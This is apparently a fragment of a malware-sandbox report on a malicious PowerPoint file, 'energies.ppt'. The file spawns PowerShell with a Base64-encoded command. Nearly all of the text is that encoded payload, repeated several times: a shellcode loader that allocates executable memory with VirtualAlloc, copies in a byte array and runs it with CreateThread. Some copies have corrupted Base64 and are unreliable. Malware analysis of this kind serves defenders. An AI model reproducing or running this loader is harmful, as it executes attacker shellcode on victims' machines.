bAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAYQAsADAAeAA4AGEALAAwAHgAZgBjACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADkAZQAsADAAeAAxAGUALAAwAHgAYQBjACwAMAB4ADQAZgAsADAAeAA3ADYALAAwAHgANQBjACwAMAB4ADQAZgAsADAAeABiADAALAAwAHgAOAA2ACwAMAB4ADAAMQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAAwADEALAAwAHgAYgBkACwAMAB4ADEAZQAsADAAeABlADcALAAwAHgAYgAxACwAMAB4AGIANQAsADAAeAA3ADMALAAwAHgAMABiACwAMAB4ADMAOQAsADAAeAA5AGIALAAwAHgANgA3ACwAMAB4ADkAOAAsADAAeAA0AGYALAAwAHgAMwA0ACwAMAB4ADgANwAsADAAeAAyADkALAAwAHgAZQA1ACwAMAB4ADYAMgAsADAAeABhADYALAAwAHgAYQBhACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgAYQA5ACwAMAB4ADIAOAAsADAAeABhADUALAAwAHgAOABiACwAMAB4ADAAOQAsADAAeAAxADEALAAwAHgANgA2ACwAMAB4AGQAZQAsADAAeAA0ADgALAAwAHgANQA2ACwAMAB4ADkAYgAsADAAeAAxADMALAAwAHgAMQA4ACwAMAB4ADAAZgAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADgAZAAsADAAeAAyADQALAAwAHgAYQBkACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgANwA2ACwAMAB4ADIAMwAsADAAeAAxAGIALAAwAHgAZABhACwAMAB4AGMAZQAsADAAeAA0ADIALAAwAHgAMABhACwAMAB4ADQAZAAsADAAeAA0ADUALAAwAHgAMQBkACwAMAB4ADgAYwAsADAAeAA2AGYALAAwAHgAOABhACwAMAB4ADEANQAsADAAeAA4ADUALAAwAHgANwA3ACwAMAB4AGMAZgAsADAAeAAxADAALAAwAHgANQBmACwAMAB4ADAAMwAsADAAeAAzAGIALAAwAHgAZQBlACwAMAB4ADUAZQAsADAAeABjADUALAAwAHgANwAyACwAMAB4ADAAZgAsADAAeABjAGMALAAwAHgAMgA4ACwAMAB4AGIAYgAsADAAeABlADIALAAwAHgAMABjACwAMAB4ADYAYwAsADAAeAA3AGIALAAwAHgAMQBkACwAMAB4ADcAYgAsADAAeAA4ADQALAAwAHgANwA4ACwAMAB4AGEAMAAsADAAeAA3AGMALAAwAHgANQAzACwAMAB4ADAAMwAsADAAeAA3AGUALAAwAHgAMAA4ACwAMAB4ADQAMAAsADAAeABhADMALAAwAHgAZgA1ACwAMAB4AGEAYQAsADAAeABhAGMALAAwAHgANQAyACwAMAB4AGQAOQAsADAAeAAyAGQALAAwAHgAMgA2ACwAMAB4ADUAOAAsADAAeAA5ADYALAAwAHgAMwBhACwAMAB4ADYAMAAsADAAeAA3AGMALAAwAHgAMgA5ACwAMAB4AGUAZQAsADAAeAAxAGEALAAwAHgANwA4ACwAMAB4AGEAMgAsADAAeAAxADEALAAwAHgAYwBkACwAMAB4ADAAOQAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGMAOQAsADAAeAA1ADIALAAwAHgAYQAyACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAMwBlACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAOABhACwAMAB4AGUAMQAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4AGMAMAAsADAAeAAwAGYALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA4AGIALAAwAHgANAA3ACwAMAB4AGMAMwAsADAAeAA0AGMALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeAA0AGIALAAwAHgAYwA2ACwAMAB4ADQANwAsADAAeABhADUALAAwAHgAZAA0ACwAMAB4ADcAYwAsADAAeABjADAALAAwAHgAOAA1ACwAMAB4ADkAZAAsADAAeAA1AGEALAAwAHgAMQA3ACwAMAB4AGUAYQAsADAAeABiADcALAAwAHgAMQBiACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgAMwA4ACwAMAB4ADUAYwAsADAAeAA4ADEALAAwAHgAZAAxACwAMAB4ADYAYwAsADAAeAAwAGMALAAwAHgAYgA5ACwAMAB4AGYAMAAsADAAeAAwAGMALAAwAHgAYwA3ACwAMAB4ADMAOQAsADAAeABmAGQALAAwAHgAZAA4ACwAMAB4ADcAMgAsADAAeAAzADAALAAwAHgANgA5ACwAMAB4AGIAOAAsADAAeAAyADIALAAwAHgAZABiACwAMAB4ADUAOAAsADAAeAA1ADYALAAwAHgAMgAxACwAMAB4AGUANAAsADAAeAA4AGIALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADUAMgAsADAAeABmAGYALAAwAHgAOQBhACwAMAB4AGIAYgAsADAAeAAwADIALAAwAHgAYgBmACwAMAB4ADQAYQAsADAAeAA1ADMALAAwAHgANAA5ACwAMAB4ADMAMAAsADAAeABiADQALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeAA5AGEALAAwAHgAZABkACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgANwAzACwAMAB4AGIANQAsADAAeAA4ADUALAAwAHgAMAA0ACwAMAB4AGQAZQAsADAAeAA0AGQALAAwAHgAMwA0ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAMgBiACwAMAB4ADcANgAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGMAYwAsADAAeAAzADgALAAwAHgAYQAzACwAMAB4ADcANgAsADAAeABkAGYALAAwAHgAYQBjACwAMAB4ADQAMwAsADAAeABjAGQALAAwAHgAYgBkACwAMAB4ADcAYQAsADAAeAA1AGIALAAwAHgAZgBiACwAMAB4AGEAOAAsADAAeAA4ADIALAAwAHgAYwA5ACwAMAB4ADAAMAAsADAAeAA3AGIALAAwAHgAZAA1ACwAMAB4ADYANQAsADAAeAAwAGIALAAwAHgANQBhACwAMAB4ADEAMQAsADAAeAAyAGEALAAwAHgAZgA0ACwAMAB4ADgAOQAsADAAeAAyAGEALAAwAHgAZQAzACwAMAB4ADYAMAAsADAAeAA3ADIALAAwAHgANAA0ACwAMAB4ADAAYwAsADAAeAA2ADUALAAwAHgANwAyACwAMAB4ADkANAAsADAAeAA1AGEALAAwAHgAZQBmACwAMAB4ADcAMgAsADAAeABmAGMALAAwAHgAMwBhACwAMAB4ADQAYgAsADAAeAAyADEALAAwAHgAMQA5ACwAMAB4ADQANQAsADAAeAA0ADYALAAwAHgANQA1ACwAMAB4AGIAMgAsADAAeABkADAALAAwAHgANgA5ACwAMAB4ADAAYwAsADAAeAA2ADcALAAwAHgANwAyACwAMAB4ADAAMgAsADAAeABiADIALAAwAHgANQBlACwAMAB4AGIANAAsADAAeAA4AGQALAAwAHgANABkACwAMAB4AGIANQAsADAAeAA0ADQALAAwAHgAZgAxACwAMAB4ADkAYgAsADAAeABmADMALAAwAHgAMwAyACwAMAB4ADEAYgAsADAAeAAxADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHEAcgBJAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAHIASQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQByAEkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHYAZQApACkAOwAkAFAAcgBZAGgAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQARABJAEkATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABEAEkASQBNACAAJABQAHIAWQBoACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFAAcgBZAGgAIAAkAGUAIgA7AH0A'"" (UID: 00054944-00003596, Additional Context: "sv IY -sv FI ecsv CSH ((gv IY).value.toString()+(gv FI).value.toString()) (gv CSH).value.toString()'JABtAHYAZQAgAD0AIAAnACQASwBDAGsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcABAGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcABAGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcABAGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIABAGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABLAEMAawBzACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgBAG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAYQAsADAAeAA4AGEALAAwAHgAZgBjACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADkAZQAsADAAeAAxAGUALAAwAHgAYQBjACwAMAB4ADQAZgAsADAAeAA3ADYALAAwAHgANQBjACwAMAB4ADQAZgAsADAAeABiADAALAAwAHgAOAA2ACwAMAB4ADAAMQAsADAAeABkADkALAAwAHgANQAACwAMAB4AGIANwAsADAAeAAwADEALAAwAHgAYgBkACwAMAB4ADEAZQAsADAAeABlADcALAAwAHgAYgAxACwAMAB4AGIANQAsADAAeAA3ADMALAAwAHgAMABiACwAMAB4ADMAOQAsADAAeAA5AGIALAAwAHgANgA3ACwAMAB4ADkAOAAsADAAeAA0AGYALAAwAHgAMwA0ACwAMAB4ADgANwAsADAAeAAyADkALAAwAHgAZQAACwAMAB4ADYAMgAsADAAeABhADYALAAwAHgAYQBhACwAMAB4ADUANgAsADAAeAAADYALAAwAHgAYQA5ACwAMAB4ADIAOAAsADAAeABhADUALAAwAHgAOABiACwAMAB4ADAAOQAsADAAeAAxADEALAAwAHgANgA2ACwAMAB4AGQAZQAsADAAeAA0ADgALAAwAHgANQA2ACwAMAB4ADkAYgAsADAAeAAxADMALAAwAHgAMQA4ACwAMAB4ADAAZgAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADgAZAAsADAAeAAyADQALAAwAHgAYQBkACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgANwA2ACwAMAB4ADIAMwAsADAAeAAxAGIALAAwAHgAZABhACwAMAB4AGMAZQAsADAAeAA0ADIALAAwAHgAMABhACwAMAB4ADQAZAAsADAAeAA0ADUALAAwAHgAMQBkACwAMAB4ADgAYwAsADAAeAA2AGYALAAwAHgAOABhACwAMAB4ADEANQAsADAAeAA4ADUALAAwAHgANwA3ACwAMAB4AGMAZgAsADAAeAAxADAALAAwAHgANQBmACwAMAB4ADAAMwAsADAAeAAzAGIALAAwAHgAZQBlACwAMAB4ADUAZQAsADAAeABjADUALAAwAHgANwAyACwAMAB4ADAAZgAsADAAeABjAGMALAAwAHgAMgA4ACwAMAB4AGIAYgAsADAAeABlADIALAAwAHgAMABjACwAMAB4ADYAYwAsADAAeAA3AGIALAAwAHgAMQBkACwAMAB4ADcAYgAsADAAeAA4ADQALAAwAHgANwA4ACwAMAB4AGEAMAAsADAAeAA3AGMALAAwAHgANQAzACwAMAB4ADAAMwAsADAAeAA3AGUALAAwAHgAMAA4ACwAMAB4ADQAMAAsADAAeABhADMALAAwAHgAZgAACwAMAB4AGEAYQAsADAAeABhAGMALAAwAHgANQAyACwAMAB4AGQAOQAsADAAeAAyAGQALAAwAHgAMgA2ACwAMAB4ADUAOAAsADAAeAA5ADYALAAwAHgAMwBhACwAMAB4ADYAMAAsADAAeAA3AGMALAAwAHgAMgA5ACwAMAB4AGUAZQAsADAAeAAxAGEALAAwAHgANwA4ACwAMAB4AGEAMgAsADAAeAAxADEALAAwAHgAYwBkACwAMAB4ADAAOQAsADAAeABmADAALAAwAHgAMwAACwAMAB4AGMAOQAsADAAeAAADIALAAwAHgAYQAyACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAMwBlACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAOABhACwAMAB4AGUAMQAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4AGMAMAAsADAAeAAwAGYALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA4AGIALAAwAHgANAA3ACwAMAB4AGMAMwAsADAAeAA0AGMALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeAA0AGIALAAwAHgAYwA2ACwAMAB4ADQANwAsADAAeABhADUALAAwAHgAZAA0ACwAMAB4ADcAYwAsADAAeABjADAALAAwAHgAOAAACwAMAB4ADkAZAAsADAAeAAAGEALAAwAHgAMQA3ACwAMAB4AGUAYQAsADAAeABiADcALAAwAHgAMQBiACwAMAB4ADgANwAsADAAeAAxADUALAAwAHgAMwA4ACwAMAB4ADUAYwAsADAAeAA4ADEALAAwAHgAZAAxACwAMAB4ADYAYwAsADAAeAAwAGMALAAwAHgAYgA5ACwAMAB4AGYAMAAsADAAeAAwAGMALAAwAHgAYwA3ACwAMAB4ADMAOQAsADAAeABmAGQALAAwAHgAZAA4ACwAMAB4ADcAMgAsADAAeAAzADAALAAwAHgANgA5ACwAMAB4AGIAOAAsADAAeAAyADIALAAwAHgAZABiACwAMAB4ADUAOAAsADAAeAAADYALAAwAHgAMgAxACwAMAB4AGUANAAsADAAeAA4AGIALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADUAMgAsADAAeABmAGYALAAwAHgAOQBhACwAMAB4AGIAYgAsADAAeAAwADIALAAwAHgAYgBmACwAMAB4ADQAYQAsADAAeAAADMALAAwAHgANAA5ACwAMAB4ADMAMAAsADAAeABiADQALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeAA5AGEALAAwAHgAZABkACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgANwAzACwAMAB4AGIANQAsADAAeAA4ADUALAAwAHgAMAA0ACwAMAB4AGQAZQAsADAAeAA0AGQALAAwAHgAMwA0ACwAMAB4AGMAOAAsADAAeABmADQALAAwAHgAMgBiACwAMAB4ADcANgAsADAAeAA0ADIALAAwAHgAZgBiACwAMAB4AGMAYwAsADAAeAAzADgALAAwAHgAYQAzACwAMAB4ADcANgAsADAAeABkAGYALAAwAHgAYQBjACwAMAB4ADQAMwAsADAAeABjAGQALAAwAHgAYgBkACwAMAB4ADcAYQAsADAAeAAAGIALAAwAHgAZgBiACwAMAB4AGEAOAAsADAAeAA4ADIALAAwAHgAYwA5ACwAMAB4ADAAMAAsADAAeAA3AGIALAAwAHgAZAAACwAMAB4ADYANQAsADAAeAAwAGIALAAwAHgANQBhACwAMAB4ADEAMQAsADAAeAAyAGEALAAwAHgAZgA0ACwAMAB4ADgAOQAsADAAeAAyAGEALAAwAHgAZQAzACwAMAB4ADYAMAAsADAAeAA3ADIALAAwAHgANAA0ACwAMAB4ADAAYwAsADAAeAA2ADUALAAwAHgANwAyACwAMAB4ADkANAAsADAAeAAAGEALAAwAHgAZQBmACwAMAB4ADcAMgAsADAAeABmAGMALAAwAHgAMwBhACwAMAB4ADQAYgAsADAAeAAyADEALAAwAHgAMQA5ACwAMAB4ADQANQAsADAAeAA0ADYALAAwAHgANQAACwAMAB4AGIAMgAsADAAeABkADAALAAwAHgANgA5ACwAMAB4ADAAYwAsADAAeAA2ADcALAAwAHgANwAyACwAMAB4ADAAMgAsADAAeABiADIALAAwAHgANQBlACwAMAB4AGIANAAsADAAeAA4AGQALAAwAHgANABkACwAMAB4AGIANQAsADAAeAA0ADQALAAwAHgAZgAxACwAMAB4ADkAYgAsADAAeABmADMALAAwAHgAMwAyACwAMAB4ADEAYgAsADAAeAAxADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHEAcgBJAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABxAHIASQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAcQByAEkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHYAZQApACkAOwAkAFAAcgBZAGgAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQARABJAEkATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABEAEkASQBNACAAJABQAHIAWQBoACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFAAcgBZAGgAIAAkAGUAIgA7AH0A';"), Spawned process "POWERPNT.EXE" with commandline ""%TEMP%\energies.ppt"" (Show Process), Spawned process "powershell.exe" with commandline "-ec JABtAHYAZQAgAD0AIAAnACQASwBDAGsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABLAEMAawBzACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABkAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4AGIAYQAsADAAeAA4AGEALAAwAHgAZgBjACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEANAAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADkAZQAsADAAeAAxAGUALAAwAHgAYQBjACwAMAB4ADQAZgAsADAAeAA3ADYALAAwAHgANQBjACwAMAB4ADQAZgAsADAAeABiADAALAAwAHgAOAA2ACwAMAB4ADAAMQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAAwADEALAAwAHgAYgBkACwAMAB4ADEAZQAsADAAeABlADcALAAwAHgAYgAxACwAMAB4AGIANQAsADAAeAA3ADMALAAwAHgAMABiACwAMAB4ADMAOQAsADAAeAA5AGIALAAwAHgANgA3ACwAMAB4ADkAOAAsADAAeAA0AGYALAAwAHgAMwA0ACwAMAB4ADgANwAsADAAeAAyADkALAAwAHgAZQA1ACwAMAB4ADYAMgAsADAAeABhADYALAAwAHgAYQBhACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgAYQA5ACwAMAB4ADIAOAAsADAAeABhADUALAAwAHgAOABiACwAMAB4ADAAOQAsADAAeAAxADEALAAwAHgANgA2ACwAMAB4AGQAZQAsADAAeAA0ADgALAAwAHgANQA2ACwAMAB4ADkAYgAsADAAeAAxADMALAAwAHgAMQA4ACwAMAB4ADAAZgAsADAAeABkADcALAAwAHgAOAA2ACwAMAB4ADgAZAAsADAAeAAyADQALAAwAHgAYQBkACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgANwA2ACwAMAB4ADIAMwAsADAAeAAxAGIALAAwAHgAZABhACwAMAB4AGMAZQAsADAAeAA0ADIALAAwAHgAMABhACwAMAB4ADQAZAAsADAAeAA0ADUALAAwAHgAMQBkACwAMAB4ADgAYwAsADAAeAA2AGYALAAwAHgAOABhACwAMAB4ADEANQAsADAAeAA4ADUALAAwAHgANwA3ACwAMAB4AGMAZgAsADAAeAAxADAALAAwAHgANQBmACwAMAB4ADAAMwAsADAAeAAzAGIALAAwAHgAZQBlACwAMAB4ADUAZQAsADAAeABjADUALAAwAHgANwAyACwAMAB4ADAAZgAsADAAeABjAGMALAAwAHgAMgA4ACwAMAB4AGIAYgAsADAAeABlADIALAAwAHgAMABjACwAMAB4ADYAYwAsADAAeAA3AGIALAAwAHgAMQBkACwAMAB4ADcAYgAsADAAeAA4ADQALAAwAHgANwA4ACwAMAB4AGEAMAAsADAAeAA3AGMALAAwAHgANQAzACwAMAB4ADAAMwAsADAAeAA3AGUALAAwAHgAMAA4ACwAMAB4ADQAMAAsADAAeABhADMALAAwAHgAZgA1ACwAMAB4AGEAYQAsADAAeABhAGMALAAwAHgANQAyACwAMAB4AGQAOQAsADAAeAAyAGQALAAwAHgAMgA2ACwAMAB4ADUAOAAsADAAeAA5ADYALAAwAHgAMwBhACwAMAB4ADYAMAAsADAAeAA3AGMALAAwAHgAMgA5ACwAMAB4AGUAZQAsADAAeAAxAGEALAAwAHgANwA4ACwAMAB4AGEAMgAsADAAeAAxADEALAAwAHgAYwBkACwAMAB4ADAAOQAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGMAOQAsADAAeAA1ADIALAAwAHgAYQAyACwAMAB4ADUANAAsADAAeAA0ADgALAAwAHgAMwBlACwAMAB4ADAANQAsADAAeAA2ADgALAAwAHgAOABhACwAMAB4AGUAMQAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4AGMAMAAsADAAeAAwAGYALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA4AGIALAAwAHgANAA3ACwAMAB4AGMAMwAsADAAeAA0AGMALAAwAHgAMwA0ACwAMAB4ADkANwAsADAAeAA0AGIALAAwAHgAYwA2ACwAMAB4ADQANwAsADAAeABhADUALAAwAHgAZAA0ACwAMAB4ADcAYwAsADAAeABjADAALAAwAHgAOAA1ACwAMAB4ADkAZAAsADAAeA